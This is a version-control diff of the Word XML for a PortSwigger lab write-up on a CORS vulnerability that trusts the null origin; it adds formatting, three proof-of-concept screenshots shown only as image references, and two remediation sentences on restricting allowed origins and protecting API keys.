+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="437331106">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1088160684">
     <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="3" w16cid:durableId="1849831374">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>

--- a/PortSwigger Labs/Client Side Topics/Cross Origin Resource Sharing - CORS/Lab 2 - CORS vulnerability with trusted null origin.docx
+++ b/PortSwigger Labs/Client Side Topics/Cross Origin Resource Sharing - CORS/Lab 2 - CORS vulnerability with trusted null origin.docx
@@ -1061,6 +1061,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -1089,6 +1090,221 @@
           <w:sz w:val="40"/>
           <w:szCs w:val="40"/>
         </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A120C40" wp14:editId="2DF993BC">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:align>right</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>615950</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6645910" cy="888365"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="268980159" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="268980159" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6645910" cy="888365"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>PROOF OF CONCEPT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="206D993C" wp14:editId="279C575C">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>1513205</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6645910" cy="1185545"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="786647897" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="786647897" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6645910" cy="1185545"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2790188B" wp14:editId="5E0A485D">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>1596390</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6645910" cy="1164590"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="1701945822" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1701945822" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6645910" cy="1164590"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>REMEDIATION</w:t>
       </w:r>
     </w:p>
@@ -1121,15 +1337,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>The Access-Control-Allow-Origin header should be set to specific trusted domains, rather than allowing any or null origins. Update the application's CORS configuration to be strict and specific about which origins are permitted.</w:t>
+        <w:t xml:space="preserve"> The Access-Control-Allow-Origin header should be set to specific trusted domains, rather than allowing any or null origins. Update the application's CORS configuration to be strict and specific about which origins are permitted.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1203,15 +1411,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Consider implementing additional layers of security for accessing sensitive data like API keys. This could include using OAuth tokens, re-authentication, or ensuring that such data is not easily accessible even if CORS is bypassed.</w:t>
+        <w:t xml:space="preserve"> Consider implementing additional layers of security for accessing sensitive data like API keys. This could include using OAuth tokens, re-authentication, or ensuring that such data is not easily accessible even if CORS is bypassed.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
